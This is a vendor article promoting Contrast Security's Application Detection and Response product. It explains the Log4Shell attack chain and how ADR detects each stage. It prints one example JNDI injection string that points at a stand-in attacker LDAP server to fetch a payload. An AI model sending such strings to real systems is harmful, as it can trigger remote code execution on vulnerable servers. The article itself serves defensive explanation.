Anatomy of an Attack
In today’s rapidly evolving cyber threat landscape, organizations face increasingly sophisticated attacks targeting their applications. Understanding these threats and the technologies designed to combat them is crucial. This article delves into the mechanics of a common application attack, using the infamous Log4Shell vulnerability as an example, and demonstrates how Application Detection and Response (ADR) technology effectively safeguards against such zero-day threats.
View the Contrast ADR white paper
The anatomy of a modern application attack: Log4Shell
To illustrate the complexity and severity of modern application attacks, let’s examine an attack against the infamous Log4Shell vulnerability (CVE-2021-44228) that sent shockwaves through the cybersecurity world in late 2021. This attack is a prime example of attack chaining, leveraging JNDI Injection, Expression Language (EL) Injection and Command Injection.
Technology note: The CVE program catalogs, which publicly disclose computer security flaws, are maintained by MITRE. Each CVE entry has a unique identifier, making it easier for IT professionals to share information about vulnerabilities across different security tools and services.
Step 1: Exploitation of the vulnerability
The Log4Shell vulnerability affects Log4j, a ubiquitous Java logging framework. The attack begins when a malicious actor sends a specially crafted request to a vulnerable application. This request contains a Java Naming and Directory Interface (JNDI) lookup string in a format like this:
${jndi:ldap://attacker-controlled-server.com/payload}
Technology note: JNDI (Java Naming and Directory Interface) is a Java API that provides naming and directory functionality to Java applications. It allows Java applications to discover and look up data and objects via a name, which can be exploited in certain vulnerabilities like Log4Shell. In this context, it’s being abused to initiate a connection to a malicious server.
Step 2: JNDI lookup and EL evaluation
When the vulnerable Log4j version processes this string, it interprets the JNDI expression part as an expression to be evaluated. This evaluation causes the application to perform a JNDI lookup, reaching out to the attacker-controlled Lightweight Directory Access Protocol (LDAP) server specified in the string.
Technology note: Log4j is a popular Java-based logging framework developed by Apache. It’s widely used in Java applications for logging various types of data and events.
Step 3: Malicious payload retrieval
The attacker’s LDAP server responds with an EL injection payload. Due to the nature of JNDI and how Log4j processes the response, this payload is treated as an EL expression to be evaluated.
Step 4: EL injection
The EL expression typically contains malicious code designed to exploit the EL interpreter. This could include commands to download and execute additional malware, exfiltrate data, or establish a backdoor in the system.
Technology note: Expression Language (EL) is a scripting language that allows access to application data. EL injection occurs when an attacker can manipulate or inject malicious EL expressions, potentially leading to code execution. EL injection vulnerabilities are a recurring theme among zero-day vulnerabilities, either directly or indirectly through chained attacks as in this example.
Step 5: Code execution
As the EL interpreter evaluates the injected expression, it executes the malicious code within the context of the vulnerable application. This gives the attacker a foothold into the system, often with the same privileges as the application itself.
The power and danger of Log4Shell
What makes the Log4Shell vulnerability particularly severe is the widespread use of the Log4j library and how easy it was to exploit the vulnerability. It carries the following concerns:
- Wide attack surface: Log4j is used in many Java applications and frameworks, making this type of vulnerability widespread.
- Remote code execution: The associated JNDI injection can lead directly to remote code execution (RCE), giving attackers significant control over the vulnerable system.
- Difficult to detect: Attacks against the Log4Shell vulnerability can be obfuscated, making them hard to detect through simple pattern matching of network-level protections.
- Chained attacks: The JNDI injection attack can be chained with other techniques, such as EL injection and Command Injection, to create more complex attacks.
This anatomy of the Log4Shell attack demonstrates why application layer attacks are so potent and why protection mechanisms like Application Detection and Response (ADR) — explained below in depth — are crucial for detecting and preventing such sophisticated attacks.
See how to eliminate your application blindspot with Contrast ADR (video)
From foothold to action on objectives
With initial access established, attackers can leverage this position to use additional tactics to accomplish other objectives, such as:
- Privilege escalation: The attacker may exploit local vulnerabilities to gain higher privileges on the compromised system.
- Reconnaissance: Using their elevated access, the attacker can scan the internal network for other vulnerable systems or valuable data.
- Credential harvesting: The compromised system may be used to extract login credentials stored in memory or configuration files.
- Pivot to other systems: Using harvested credentials or exploiting other vulnerabilities, the attacker can compromise additional systems within the network.
- Data exfiltration or ransomware deployment: Depending on their objectives, attackers may steal sensitive data or deploy ransomware across the compromised network.
The limitations of existing security approaches
Before we dive into the details of ADR, it’s crucial to understand how it addresses a significant gap in many organizations’ security strategies: the lack of robust application-level threat detection.
Web application firewalls (WAFs)
Many organizations rely on WAFs as their primary defense against application-level threats. However, this approach has several critical limitations:
- Network-level focus: WAFs operate at the network level, analyzing incoming traffic patterns to detect potential threats. While this can be effective against known attack signatures, it provides limited visibility into what’s happening within the application itself.
- False positives: Due to their lack of application-specific context, WAFs often generate a high number of false positives. This can overwhelm security teams and lead to alert fatigue.
- Vulnerability to bypass techniques: WAF bypass techniques are surprisingly easy to execute. Attackers can often circumvent WAF protections using methods like encoding variations, protocol-level evasion or payload padding.
- Ineffective SOC integration: Even when organizations have WAFs in place, they often fail to configure them to feed detailed application-level information to their security operations center (SOC).
Technology note: A WAF is a security tool that monitors, filters and blocks HTTP traffic to and from a web application. It operates at the network level and is intended to help protect web applications from various attacks, such as Cross-Site Scripting (XSS) and SQL injection.
Technology note: WAF bypasses are techniques attackers use to render WAF security controls ineffective. These include methods to sneak malicious payloads past the WAF’s signature-based protections, or outright avoidance of the WAF entrypoint to the application. It is important to have a defense-in-depth strategy when it comes to AppSec and not rely on a single control to ensure security of the application layer.
Endpoint Detection and Response (EDR)
EDR solutions focus on monitoring and protecting individual endpoints within an organization. While crucial for overall security, EDR has its own set of limitations when it comes to application security:
- Focus on endpoint activities: EDR primarily monitors system-level events and processes, not application-specific behaviors.
- Limited visibility into application internals: EDR solutions don’t have insight into the internal workings of applications.
- Reactive nature: EDR often detects threats after they’ve already executed on an endpoint.
- Gaps in cloud and web application coverage: As applications move to cloud-based services, traditional EDR solutions may have gaps.
Technology note: EDR is a cybersecurity technology that continuously monitors and responds to threats on endpoint devices such as computers, laptops and mobile devices. EDR solutions collect and analyze data from endpoints to enable security operations teams to detect, investigate and mitigate suspicious activities and potential security breaches. They typically provide real-time visibility, threat detection and automated response capabilities, focusing on endpoint-level activities rather than application-specific behaviors.
The ADR advantage
ADR technology addresses these limitations by working within the application itself. This approach offers several key advantages:
- Deep application visibility: ADR provides insight into code execution and data flow, offering a level of visibility that network-level solutions simply cannot match.
- Context-aware detection: By understanding the application’s behavior, ADR can more accurately distinguish between legitimate actions and genuine threats, significantly reducing false positives.
- Zero-day vulnerability protection: ADR’s deep application insight allows it to detect and respond to novel attack patterns, providing better protection against zero-day vulnerabilities.
- Defense-in-depth for WAF bypass: ADR serves as a crucial second line of defense, capable of detecting threats that have successfully bypassed WAF protections.
- Rich, actionable intelligence: ADR can provide detailed, context-rich information about application-level threats directly to SOC teams, closing the visibility gap and enabling more effective threat response.
- By implementing ADR, organizations can fill this critical gap in their security posture, gaining the ability to detect and respond to sophisticated application-level threats that existing solutions might miss.
Technology note: ADR is a security approach that focuses on detecting and responding to threats at the application level. Unlike other AppSec measures that operate at the network level, ADR works within the application itself, providing deeper visibility into application behavior and more accurate threat detection.
Technology note: A zero-day vulnerability is a software security flaw that is unknown to the software vendor and has not yet been patched. These vulnerabilities can be exploited by attackers before the vendor becomes aware and hurries to fix them.
Contrast ADR in action
Contrast Security employs innovative ADR technology to detect and prevent attacks like Log4Shell at multiple stages. Let’s understand the architecture that makes this possible and examine how it plays out in practice.
Contrast ADR architecture
Contrast ADR uses agent-based architecture, integrating directly with the application runtime:
- Agent deployment: A lightweight agent is deployed within the application’s runtime environment (e.g., Java Virtual Machine [JVM] for Java applications).
- Runtime integration: The agent integrates seamlessly with the application code, allowing it to monitor and analyze application behavior in real time.
- Instrumentation: Contrast uses instrumentation techniques to observe code execution, data flow and API calls without modifying the application’s source code.
- Response mechanism: When a threat is detected, Contrast can take immediate action, such as blocking the malicious activity or alerting security teams.
Multi-stage protection against Log4Shell
Stage 1: JNDI injection detection
Contrast Runtime Security identifies the malicious JNDI lookup attempt by enhancing the JVM’s security settings to prevent abuse of JNDI capabilities.
Stage 2: EL injection detection
Contrast Runtime Security identifies EL injection attempts and protects against them by enhancing the JVM’s security settings to prevent abuse of the JVM’s EL processor capabilities.
Stage 3: Blocking code execution
In the unlikely event that malicious code is loaded, the Contrast Runtime Security Platform utilizes:
- Command injection protection: Leveraging classification, tracing and semantic analysis techniques to prevent attacker payloads from reaching sensitive APIs.
- Process hardening: Enhancing the JVM’s security settings to prevent abuse of JVM’s sensitive APIs related to command execution.
Real-world example: Log4Shell attack detection and analysis
To better understand how Contrast’s ADR technology works in practice, let’s examine a series of events from a replicated Log4Shell attack detection.
Note: All behavioral rules are set to MONITOR mode, not BLOCK mode, for this example to illustrate attacker exploit chaining and the defense-in-depth detection capabilities of Contrast’s ADR. Normally, these rules would be set to BLOCK mode, catching and blocking the initial JNDI exploit, and preventing the subsequent events from occurring in the first place.
- JNDI injection detection: Contrast ADR identifies a JNDI injection attempt, detecting an effort to redirect an InitialContext lookup to an attacker-controlled LDAP server.
- EL injection detection: ADR identifies an EL injection event, where the evaluated expression uses Java class loading to load the JavaScript engine embedded in the JVM. The payload uses JavaScript to create a malicious array intended to execute system commands.
- Command injection detection: Contrast ADR identifies a Command injection event, where the command attempts to download and execute a shell script from an attacker-controlled server.
This detailed breakdown demonstrates Contrast ADR’s ability to:
- Detect the initial JNDI injection attempt
- Track the attack through multiple stages of execution
- Identify and analyze malicious payloads
- Provide deep visibility into the attack chain, from initial exploit to potential code execution
This level of insight is critical to prevent attacks and understand new threat patterns.
ADR response to Log4Shell attack
When Contrast ADR detects a potential Log4Shell exploitation attempt, it triggers a comprehensive response that aligns with the NIST Cybersecurity Framework:
Identify
- Uses runtime Software Composition Analysis (SCA) to continuously map and inventory the application environment, identifying vulnerable Log4j instances.
- Provides real-time visibility into the application’s behavior and data flow during the attack attempt.
Protect
- If in blocking mode, prevents the initial JNDI lookup to the malicious server.
- Enhances JVM security settings to limit JNDI capabilities, reducing the attack surface.
Detect
- Identifies and alerts on the JNDI lookup attempt to the malicious LDAP server.
- Detects attempts to execute malicious EL payloads.
- Monitors for unauthorized Java class loading and execution.
- Identifies suspicious process executions indicative of command injection.
Respond
- Triggers use of predefined run books for Log4Shell incidents.
- Provides enhanced triaging context, including detailed attack chain analysis and affected application components.
- Integrates with SIEM/XDR/SOAR systems, enriching alerts with application-layer context for more effective incident analysis.
Technology note: SIEM (Security Information and Event Management) is a system that collects and analyzes log data from various sources across an organization’s IT infrastructure. It helps in real-time analysis of security alerts generated by applications and network hardware. Some SIEM examples include Splunk, QRadar and Microsoft Sentinel.
Technology note: XDR (Extended Detection and Response) is a holistic security approach that collects and automatically correlates data across multiple security layers — email, endpoints, servers, cloud workloads and networks. It uses analytics to detect threats and automatically respond to them, providing a more comprehensive and efficient way to detect, investigate and respond to cybersecurity incidents across the entire IT ecosystem.
Recover
- Supports incident investigation by providing detailed forensic data about the attack attempt.
- Assists in identifying the full extent of potential compromise across the application portfolio.
- Facilitates post-incident analysis to improve detection and protection capabilities.
- Provides data to support root cause analysis, helping prevent similar incidents in the future.
Throughout this process, the ADR system maintains continuous monitoring, provides real-time updates to security dashboards, and supports compliance reporting by documenting all detection and response actions taken.
ADR integration with SIEM/SOAR/XDR ecosystem
The integration of ADR technology with existing Security Information and Event Management (SIEM); security orchestration, automation and response (SOAR); and Extended Detection and Response (XDR) systems creates a powerful synergy that enhances overall security operations. Here’s how ADR can fit into and augment SIEM//SOAR/XDR-driven workflows:
- Enhanced incident response and analysis: ADR-generated alerts are correlated with network-level events in SIEM/SOAR/XDR, providing a comprehensive view of potential attacks and enabling more effective root cause analysis.
- Dynamic security control: SIEM/SOAR/XDR can dynamically switch ADR to blocking mode, deploy virtual patches and activate enhanced logging.
- Coordinated threat mitigation: SIEM/SOAR/XDR coordinate blocking malicious IP addresses and use ADR’s application-specific context for effective response strategies.
- Streamlined security-development collaboration: ADR generates vulnerability reports and integrates ticketing systems, streamlining communication between security and development teams.
By integrating ADR into the SIEM/SOAR/XDR ecosystem, organizations achieve more comprehensive threat detection, faster incident response and more effective vulnerability management, significantly enhancing their overall security posture.
Business benefits of ADR technology
Implementing Contrast’s ADR technology translates into tangible business benefits:
- Reduced risk: By providing multi-layered, context-aware protection, ADR significantly reduces the risk of successful attacks, protecting your organization’s data and reputation.
- Lower total cost of ownership: With fewer false positives and automated protection, security teams can focus on high-priority issues, reducing operational costs.
- Improved compliance posture: ADR’s comprehensive protection and detailed logging assist in meeting various compliance requirements, such as PCI DSS and GDPR.
- Faster time-to-market: By securing applications from within, ADR allows development teams to move faster without compromising on security, aligning with Secure by Design principles.
- Enhanced visibility: The deep insights provided by ADR technology improve overall security posture and inform strategic security decisions.
Note: PCI DSS (Payment Card Industry Data Security Standard) is a set of security standards designed to ensure that all companies that accept, process, store or transmit credit card information maintain a secure environment.
Note: GDPR (General Data Protection Regulation) is a regulation in EU law on data protection and privacy in the European Union and the European Economic Area. It also addresses the transfer of personal data outside the EU and EEA areas.
Conclusion
As cyber threats continue to evolve, network-based application security measures are no longer sufficient to protect critical applications and data. Contrast’s ADR technology offers a robust, intelligent and proactive approach to application security.
By understanding the anatomy of modern attacks and leveraging cutting-edge ADR solutions, organizations can significantly enhance their security posture, minimize risk and stay ahead of emerging threats. As a security decision-maker, investing in ADR technology is not just a security measure — it’s a strategic imperative for safeguarding your organization’s digital assets in today’s threat landscape.
Next steps
To learn more about how ADR technology can protect your organization and see its capabilities in action, request a demo of Contrast ADR.
By taking these steps, you’ll be well on your way to strengthening your application security and staying ahead of evolving cyber threats.
Note: This article is authored by Jonathan Harper, Principal Solutions Engineer at Contrast Security, with over five years of experience in application security. Jonathan has supported large enterprises and previously held roles at Threat Stack, Veracode, and Micron Technology.